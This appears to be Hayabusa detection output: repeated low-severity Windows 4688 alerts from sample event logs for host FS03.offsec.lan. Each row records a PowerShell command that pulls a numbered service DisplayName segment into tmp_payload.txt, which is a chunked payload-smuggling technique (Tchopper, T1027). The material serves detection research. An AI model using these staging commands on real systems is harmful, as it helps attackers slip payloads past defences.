2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
